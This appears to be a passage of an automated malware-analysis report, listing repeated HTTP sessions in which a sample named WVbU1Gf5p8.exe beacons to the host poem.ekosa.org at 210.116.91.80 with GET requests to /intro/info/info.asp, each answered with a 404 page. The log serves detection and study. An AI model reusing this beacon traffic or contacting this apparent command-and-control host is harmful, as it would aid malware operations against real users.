      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:17.200546980 CET5132INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:16 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      138192.168.2.449916210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:17.585695028 CET5133OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:17.849153996 CET5133INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:17 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      139192.168.2.449917210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:18.126372099 CET5134OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:18.398231030 CET5134INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:17 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      14192.168.2.449777210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:04.690062046 CET276OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:04.969022989 CET280INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:04 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      140192.168.2.449918210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:18.669869900 CET5135OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:18.933769941 CET5136INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:18 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      141192.168.2.449919210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:19.314114094 CET5136OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:19.576531887 CET5137INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:18 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      142192.168.2.449920210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:19.848494053 CET5138OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:20.111985922 CET5138INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:19 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      143192.168.2.449921210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:20.385375977 CET5139OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:20.649458885 CET5139INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:19 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      144192.168.2.449922210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:21.034924984 CET5140OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:21.298191071 CET5141INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:21 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      145192.168.2.449923210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:21.567193031 CET5141OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:21.826863050 CET5142INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:21 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      146192.168.2.449924210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:22.097666025 CET5143OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:22.359352112 CET5143INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:22 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
